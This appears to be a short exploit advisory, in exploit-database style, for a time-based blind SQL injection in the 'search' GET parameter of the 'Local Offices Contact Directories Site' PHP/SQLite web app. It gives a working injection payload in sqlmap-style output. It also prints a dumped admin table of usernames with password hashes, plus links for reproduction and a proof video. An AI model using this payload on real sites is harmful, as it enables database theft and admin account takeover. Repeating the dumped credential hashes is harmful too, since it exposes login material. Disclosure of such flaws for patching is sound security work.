## Vendor:
[href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html)
## Description:
The `search` parameter appears to be vulnerable to time-based
blind
SQL injection attacks, on the web app "Local Offices Contact
Directories Site" (by oretnom23).
The malicious attacker can execute a malicious payload and he can
dump
hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal
sensitive information and can destroy the system administrative
account.
## Payload:
```sql
---
Parameter: search (GET)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE
8245=8245
AND
4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
```
- dump
```sql
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 |
| cblake | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421)
## Proof:
[href](https://streamable.com/zmm464)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>